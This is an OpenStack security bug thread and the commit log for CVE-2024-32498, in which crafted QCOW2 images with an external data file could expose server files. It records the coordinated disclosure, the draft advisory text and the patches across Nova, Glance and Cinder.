[OSSA-2024-001] Arbitrary file access through QCOW2 external data file (CVE-2024-32498)

Since this report concerns a possible security risk, an incomplete
security advisory task has been added while the core security
reviewers for the affected project or projects confirm the bug and
discuss the scope of any vulnerability along with potential
solutions.

My initial impression is that this seems like a fairly similar situation to https://security.openstack.org/ossa/OSSA-2023-002.html in which case we may want to involve the Cinder and Glance security reviewers too, but we'll start with Nova and see where it leads.

It's also similar to an earlier one specifically referring to qcow files. We currently protect against the backing file of a qcow pointing somewhere, but it looks like this data_file option provides another route to get similar functionality. We will probably need similar mitigations in the same area we currently have them for backing files in nova, glance, and cinder.

We're also all (I think) now using oslo.utils/imageutils to probe the qcow files. AFAICT, that does not expose the general list of extra options, so we'll need to augment oslo.utils as well.

EDIT: Yeah, it does, under "format-specific"

Proposed patch to nova to detect and reject qcow2 images with data-file set

Proposed patch to glance to detect and reject qcow2 images with data-file set

I subscribed Brian Rosmaita who can evaluate the cinder impact and also review the glance patch.

Added Eric Harney for cinder.

Guess I should state explicitly that this also affects cinder, when it converts an image to raw format to write to a volume.

I agree with the design proposal which is about not accepting an image with a data-file set.
Nova doesn't need to use an external disk for a guest, so we could no longer support it.

I'll look at Dan's patch today.

Nova's patch proposed by Dan relies on the same mitigation provided in https://security.openstack.org/ossa/OSSA-2023-002.html where we rely on a metadata that was added in osloutils's imageutils.py module by https://github.com/openstack/oslo.utils/commit/2180db82b605cf84902ee379fffc0b34e17e92c7

This sounds to me the correct approach as we can backport it down to the last Maintained releases but any distro can also backport it further down to Ussuri if they want (exactly like OSSA-2023-002)

+1 on nova-2059809.patch but I'll test it on a dev environment.

Martin Kaesberger: Did you notify any organizations about this other than reporting the bug to us? I just received a request from a public cloud provider for access to the bug report, which means the private embargo has been broken and we probably need to disclose this by switching to our public workflow immediately rather than continuing to work on it in private.

Updated cinder patch to include a release note.

For now I'm subscribing some technical representatives from OVH (the provider on whose behalf I was contacted), on the assumption they were the only outside organization notified, so that they might assist with reviewing and testing the proposed fixes.

Jeremy Stanley: The reference to the production system the report refers to the fact that it was discovered in the OVHcloud. I reported it to them in private first and was referred here.

Thanks for confirming. In this case it seems like we should be able to continue working on this in private for now, with added assistance from folks at OVH.

Dan's glance-2059809.patch LGTM.

Nova backport for 2024.1

Nova backport for 2023.2

Nova backport for 2023.1

Nova backport for zed

Glance backport for 2024.1

Glance backport for 2023.2

Glance backport for 2023.1

Glance backport for zed

brian-rosmaita's cinder-2059809.patch from comment #16 looks good to me.

Cinder patch for 2024.1 (Caracal)

Cinder patch for 2023.2 (Bobcat).

Cinder patch for 2023.1 (Antelope)

Cinder patch for Zed.

Cinder patch for unmaintained/yoga, as a courtesy.

@arnaud-morin: would you mind deleting your patches so that people don't get confused? Thanks!

Martin Kaesberger: If there's any organization you're affiliated with and you'd like it credited along with your name, please let me know.

Here's a draft impact description, a quick review for any inaccuracies is appreciated so I can request a CVE assignment with it...

title: Arbitrary file access through custom QCOW2 external data

description: >
  Martin Kaesberger reported a vulnerability in QCOW2 image processing for
  Cinder, Glance and Nova. By supplying a specially created QCOW2 image which
  references a specific data file path, an authenticated user may convince
  systems to return a copy of that file's contents from the server resulting in
  unauthorized access to potentially sensitive data. All Cinder deployments are
  affected; only Glance deployments with image conversion enabled are affected;
  all Nova deployments are affected.

affected-products:
  - product: Cinder
    version: '<21.3.3, >=22.0.0 <22.1.2, >=23.0.0 <23.1.1, ==24.0.0'
  - product: Glance
    version: '<25.1.1, ==26.0.0, ==27.0.0, >=28.0.0 <28.0.2'
  - product: Nova
    version: '<26.2.3, >=27.0.0 <27.2.1, >=28.0.0 <28.0.2, >=29.0.0 <29.0.2'

Draft description LGTM, and the version lists check out.

When is this planned to be fix released for Ussuri as well?

This issue was fixed in the openstack/glance 26.1.0 release.

This issue was fixed in the openstack/glance 27.1.0 release.

This issue was fixed in the openstack/glance 28.1.0 release.

@Chris

Currently Ussuri is unmaintained and we are not planning to do any changes there. But if you see comment #231 from Dan you can create similar change for ussuri locally.

https://bugs.launchpad.net/nova/+bug/2059809/comments/231

Related fix proposed to branch: stable/2024.1
Review: https://review.opendev.org/c/openstack/nova/+/923724

Related fix proposed to branch: stable/2023.2
Review: https://review.opendev.org/c/openstack/nova/+/923729

Related fix proposed to branch: stable/2023.1
Review: https://review.opendev.org/c/openstack/nova/+/923733

This issue was fixed in the openstack/nova 27.4.0 release.

This issue was fixed in the openstack/nova 28.2.0 release.

This issue was fixed in the openstack/nova 29.1.0 release.

This issue was fixed in the openstack/cinder 22.2.0 release.

This issue was fixed in the openstack/cinder 23.2.0 release.

This issue was fixed in the openstack/cinder 24.1.0 release.

Fix proposed to branch: unmaintained/yoga
Review: https://review.opendev.org/c/openstack/cinder/+/923873

Reviewed: https://review.opendev.org/c/openstack/nova/+/923298
Committed: https://opendev.org/openstack/nova/commit/da352edceb74dbd715268f94516503042b48cc90
Submitter: "Zuul (22348)"
Branch: unmaintained/zed

commit da352edceb74dbd715268f94516503042b48cc90
Author: Dan Smith <email address hidden>
Date: Wed Apr 17 07:06:13 2024 -0700

    Check images with format_inspector for safety

    It has been asserted that we should not be calling qemu-img info
    on untrusted files. That means we need to know if they have a
    backing_file, data_file or other unsafe configuration *before* we use
    qemu-img to probe or convert them.

    This grafts glance's format_inspector module into nova/images so we
    can use it to check the file early for safety. The expectation is that
    this will be moved to oslo.utils (or something) later and thus we will
    just delete the file from nova and change our import when that happens.

    NOTE: This includes whitespace changes from the glance version of
    format_inspector.py because of autopep8 demands.

    Change-Id: Iaefbe41b4c4bf0cf95d8f621653fdf65062aaa59
    Closes-Bug: #2059809
    (cherry picked from commit 9cdce715945619fc851ab3f43c97fab4bae4e35a)
    (cherry picked from commit f07fa55fd86726eeafcd4c0c687bc49dd4df9f4c)
    (cherry picked from commit 0acf5ee7b5dfb6ff0f9a9745f5ad2a0ed2bf65bf)
    (cherry picked from commit 67e5376dd64407f5aaf1ea5f8c896e356064a2c9)

Reviewed: https://review.opendev.org/c/openstack/nova/+/923300
Committed: https://opendev.org/openstack/nova/commit/a2acb31d790e6cb41c067bfc0343bde274c9428c
Submitter: "Zuul (22348)"
Branch: unmaintained/zed

commit a2acb31d790e6cb41c067bfc0343bde274c9428c
Author: Dan Smith <email address hidden>
Date: Mon Jul 1 09:06:40 2024 -0700

    Fix vmdk_allowed_types checking

    This restores the vmdk_allowed_types checking in create_image()
    that was unintentionally lost by tightening the
    qemu-type-matches-glance code in the fetch patch recently. Since we
    are still detecting the format of base images without metadata, we
    would have treated a vmdk file that claims to be raw as raw in fetch,
    but then read it like a vmdk once it was used as a base image for
    something else.

    Conflicts:
      nova/tests/unit/virt/libvirt/test_utils.py

    NOTE(elod.illes): conflicts are due to encryption support adding patch
    I5d6d2a7b03b5ace0826af80c4004de852579ff12 was introduced in zed.

    Change-Id: I07b332a7edb814f6a91661651d9d24bfd6651ae7
    Related-Bug: #2059809
    (cherry picked from commit 08be7b2a0dc1d7728d8034bc2aab0428c4fb642e)
    (cherry picked from commit 11301e7e3f0d81a3368632f90608e30d9c647111)
    (cherry picked from commit 70a435fd519a0ebcc3ac9ad5254fefbf19c93e48)
    (cherry picked from commit f732f8476851e6272d8ad9937f54b918795844e8)

Related fix proposed to branch: master
Review: https://review.opendev.org/c/openstack/nova/+/923924

Related fix proposed to branch: stable/2024.1
Review: https://review.opendev.org/c/openstack/nova/+/923935

Related fix proposed to branch: stable/2023.2
Review: https://review.opendev.org/c/openstack/nova/+/923936

Related fix proposed to branch: stable/2023.1
Review: https://review.opendev.org/c/openstack/nova/+/923937

Reviewed: https://review.opendev.org/c/openstack/nova/+/923724
Committed: https://opendev.org/openstack/nova/commit/eeda7c333c773216c216159926673874ce4843ba
Submitter: "Zuul (22348)"
Branch: stable/2024.1

commit eeda7c333c773216c216159926673874ce4843ba
Author: Sean Mooney <email address hidden>
Date: Thu Jul 4 20:09:31 2024 +0100

    Add iso file format inspector

    This change includes unit tests for the ISO
    format inspector using mkisofs to generate
    the iso files.

    A test for stashing qcow content in the system_area
    of an iso file is also included.

    This change modifies format_inspector.detect_file_format
    to evaluate all inspectors until they are complete and
    raise an InvalidDiskInfo exception if multiple formats
    match.

    Related-Bug: #2059809
    Change-Id: I7e12718fb3e1f77eb8d1cfcb9fa64e8ddeb9e712
    (cherry picked from commit b1cc39848ebe9b9cb63141a647bda52a2842ee4b)

Reviewed: https://review.opendev.org/c/openstack/nova/+/923924
Committed: https://opendev.org/openstack/nova/commit/c6d8c6972d52845774b36acb84cd08a4b2e4dcde
Submitter: "Zuul (22348)"
Branch: master

commit c6d8c6972d52845774b36acb84cd08a4b2e4dcde
Author: Balazs Gibizer <email address hidden>
Date: Thu Jul 11 07:29:40 2024 +0200

    Stabilize iso format unit tests

    Some version of mkisofs does not properly handle if both the input and
    the output file of the command are the same. So this commit changes the
    unit tests depending on that binary to use a different files.

    Related-Bug: #2059809
    Change-Id: I6924eb23ff5804c22a48ec6fabcec25f061906bb

Reviewed: https://review.opendev.org/c/openstack/nova/+/923935
Committed: https://opendev.org/openstack/nova/commit/a8783a767551df3dd943bd862cdba35c51cdb7a6
Submitter: "Zuul (22348)"
Branch: stable/2024.1

commit a8783a767551df3dd943bd862cdba35c51cdb7a6
Author: Balazs Gibizer <email address hidden>
Date: Thu Jul 11 07:29:40 2024 +0200

    Stabilize iso format unit tests

    Some version of mkisofs does not properly handle if both the input and
    the output file of the command are the same. So this commit changes the
    unit tests depending on that binary to use a different files.

    Related-Bug: #2059809
    Change-Id: I6924eb23ff5804c22a48ec6fabcec25f061906bb
    (cherry picked from commit c6d8c6972d52845774b36acb84cd08a4b2e4dcde)

Reviewed: https://review.opendev.org/c/openstack/nova/+/923729
Committed: https://opendev.org/openstack/nova/commit/24628ecbbe9d5fdd4fe6767ca92395f0d3da9e48
Submitter: "Zuul (22348)"
Branch: stable/2023.2

commit 24628ecbbe9d5fdd4fe6767ca92395f0d3da9e48
Author: Sean Mooney <email address hidden>
Date: Thu Jul 4 20:09:31 2024 +0100

    Add iso file format inspector

    This change includes unit tests for the ISO
    format inspector using mkisofs to generate
    the iso files.

    A test for stashing qcow content in the system_area
    of an iso file is also included.

    This change modifies format_inspector.detect_file_format
    to evaluate all inspectors until they are complete and
    raise an InvalidDiskInfo exception if multiple formats
    match.

    Related-Bug: #2059809
    Change-Id: I7e12718fb3e1f77eb8d1cfcb9fa64e8ddeb9e712
    (cherry picked from commit b1cc39848ebe9b9cb63141a647bda52a2842ee4b)
    (cherry picked from commit eeda7c333c773216c216159926673874ce4843ba)

Fix proposed to branch: unmaintained/yoga
Review: https://review.opendev.org/c/openstack/nova/+/924081

Fix proposed to branch: unmaintained/yoga
Review: https://review.opendev.org/c/openstack/nova/+/924082

Related fix proposed to branch: unmaintained/yoga
Review: https://review.opendev.org/c/openstack/nova/+/924084

Reviewed: https://review.opendev.org/c/openstack/nova/+/923936
Committed: https://opendev.org/openstack/nova/commit/02147b36d35e1e462e1405c36a2e67a33de806de
Submitter: "Zuul (22348)"
Branch: stable/2023.2

commit 02147b36d35e1e462e1405c36a2e67a33de806de
Author: Balazs Gibizer <email address hidden>
Date: Thu Jul 11 07:29:40 2024 +0200

    Stabilize iso format unit tests

    Some version of mkisofs does not properly handle if both the input and
    the output file of the command are the same. So this commit changes the
    unit tests depending on that binary to use a different files.

    Related-Bug: #2059809
    Change-Id: I6924eb23ff5804c22a48ec6fabcec25f061906bb
    (cherry picked from commit c6d8c6972d52845774b36acb84cd08a4b2e4dcde)
    (cherry picked from commit a8783a767551df3dd943bd862cdba35c51cdb7a6)

Reviewed: https://review.opendev.org/c/openstack/nova/+/923733
Committed: https://opendev.org/openstack/nova/commit/65f0789df05e2ba7f11c0eaf2c6959367acbced2
Submitter: "Zuul (22348)"
Branch: stable/2023.1

commit 65f0789df05e2ba7f11c0eaf2c6959367acbced2
Author: Sean Mooney <email address hidden>
Date: Thu Jul 4 20:09:31 2024 +0100

    Add iso file format inspector

    This change includes unit tests for the ISO
    format inspector using mkisofs to generate
    the iso files.

    A test for stashing qcow content in the system_area
    of an iso file is also included.

    This change modifies format_inspector.detect_file_format
    to evaluate all inspectors until they are complete and
    raise an InvalidDiskInfo exception if multiple formats
    match.

    Related-Bug: #2059809
    Change-Id: I7e12718fb3e1f77eb8d1cfcb9fa64e8ddeb9e712
    (cherry picked from commit b1cc39848ebe9b9cb63141a647bda52a2842ee4b)
    (cherry picked from commit eeda7c333c773216c216159926673874ce4843ba)
    (cherry picked from commit 24628ecbbe9d5fdd4fe6767ca92395f0d3da9e48)

Reviewed: https://review.opendev.org/c/openstack/cinder/+/923314
Committed: https://opendev.org/openstack/cinder/commit/4aa6590a483901de64e0d162fff11f3d2d7f9977
Submitter: "Zuul (22348)"
Branch: unmaintained/zed

commit 4aa6590a483901de64e0d162fff11f3d2d7f9977
Author: Brian Rosmaita <email address hidden>
Date: Wed Jun 26 14:09:30 2024 -0400

    CVE-2024-32498: Check for external qcow2 data file

    Adds code to image_utils to check for a qcow2 external data
    file, a recent feature of qemu which we do not support and
    which can be used maliciously.

    Advice from the qemu-img community is that it is dangerous
    to call qemu-img info on untrusted files, so we copy over
    the format_inspector module from Glance. This performs basic
    analysis on the image data file so we can detect problematic
    images before we call qemu-img info to get all the image
    attributes. It is expected that this code will eventually be
    added to oslo so it can be consumed by Glance, Cinder, and
    Nova.

    Because cinder itself may create qcow2 format images with a
    backing file in nfs-based backends, the glance format_inspector
    has been modified to optionally allow such files. Since we are
    monkeying with the format_inspector code, we also copy over
    its unit tests to prevent regressions and to add tests for the
    changed code.

    Includes an additional fix to prevent an issue where a user
    could mount a raw volume and write a qcow2 header with a larger
    virtual size on it. On reattaching the volume it would have the
    new larger virtual size avaialable without actually changing
    the size value in cinder. While we cannot prevent this we can
    prevent the user from using this volume again, which makes this
    exploit pointless.

    Co-authored-by: Dan Smith <email address hidden>
    Co-authored-by: Felix Huettner <email address hidden>

    Change-Id: I65857288b797cde573e7443ac6e7e6f57fedde01
    Closes-bug: #2059809
    (cherry picked from commit d6a186945e03649343af55b46ed8dfe0dd326e40)
    (cherry picked from commit db98dc207060da234c32a563c13cac1edbd62952)
    (cherry picked from commit 9e667b02b2c20b4ada18c1a472be152956284d45)
    (cherry picked from commit 5f5e86e3542866227b7339713148b5169d069f21)

Reviewed: https://review.opendev.org/c/openstack/nova/+/923937
Committed: https://opendev.org/openstack/nova/commit/47428f6caf503b94583dac614b59971f60a0ba9c
Submitter: "Zuul (22348)"
Branch: stable/2023.1

commit 47428f6caf503b94583dac614b59971f60a0ba9c
Author: Balazs Gibizer <email address hidden>
Date: Thu Jul 11 07:29:40 2024 +0200

    Stabilize iso format unit tests

    Some version of mkisofs does not properly handle if both the input and
    the output file of the command are the same. So this commit changes the
    unit tests depending on that binary to use a different files.

    Related-Bug: #2059809
    Change-Id: I6924eb23ff5804c22a48ec6fabcec25f061906bb
    (cherry picked from commit c6d8c6972d52845774b36acb84cd08a4b2e4dcde)
    (cherry picked from commit a8783a767551df3dd943bd862cdba35c51cdb7a6)
    (cherry picked from commit 02147b36d35e1e462e1405c36a2e67a33de806de)

Reviewed: https://review.opendev.org/c/openstack/glance/+/923304
Committed: https://opendev.org/openstack/glance/commit/6a38aef8baaf5caecbd8c866f1cf922d939dfbcc
Submitter: "Zuul (22348)"
Branch: unmaintained/zed

commit 6a38aef8baaf5caecbd8c866f1cf922d939dfbcc
Author: Dan Smith <email address hidden>
Date: Mon Apr 1 08:06:31 2024 -0700

    Reject qcow files with data-file attributes

    Change-Id: I6326a3e85c1ba4cb1da944a4323769f2399ed2c1
    Closes-Bug: #2059809
    (cherry picked from commit 2ca29af4433e9fa99a0a48e230d8d25d6eaa4a87)
    (cherry picked from commit c3586f3a122f6cb0663217b12b52203e74e2e4fa)
    (cherry picked from commit a92c438fb5ba55440b38cae7c8b4361b58daa9dd)
    (cherry picked from commit dba3bdb458aa8a5d0193f12b7f1e374a89ed34a2)

Reviewed: https://review.opendev.org/c/openstack/glance/+/923305
Committed: https://opendev.org/openstack/glance/commit/f32d5b8ad865113d499a36f7507a085f583514f9
Submitter: "Zuul (22348)"
Branch: unmaintained/zed

commit f32d5b8ad865113d499a36f7507a085f583514f9
Author: Dan Smith <email address hidden>
Date: Tue Apr 16 10:29:10 2024 -0700

    Extend format_inspector for QCOW safety

    This adds two properties to the QcowInspector that makes it able to
    indicate whether the file specifies a backing_file or data_file in the
    header. Both conditions are considered unsafe for our usage. To
    ease checking of this condition, a classmethod is added that takes
    a local filename and digests just enough of the file to assert that
    both conditions are false.

    Change-Id: Iaf86b525397d41bd116999cabe0954a0a7efac65
    Related-Bug: #2059809
    (cherry picked from commit ae536bb394793c9a7a219cb498e03d5c81dbbbb7)
    (cherry picked from commit 2eba54e0821106097dfeceb424e53943fd090483)
    (cherry picked from commit 89dbbc838d606f461087e1494d19ddbcf9db0a38)
    (cherry picked from commit 4860024286256b028fabc5ed50274934c3dfdd8a)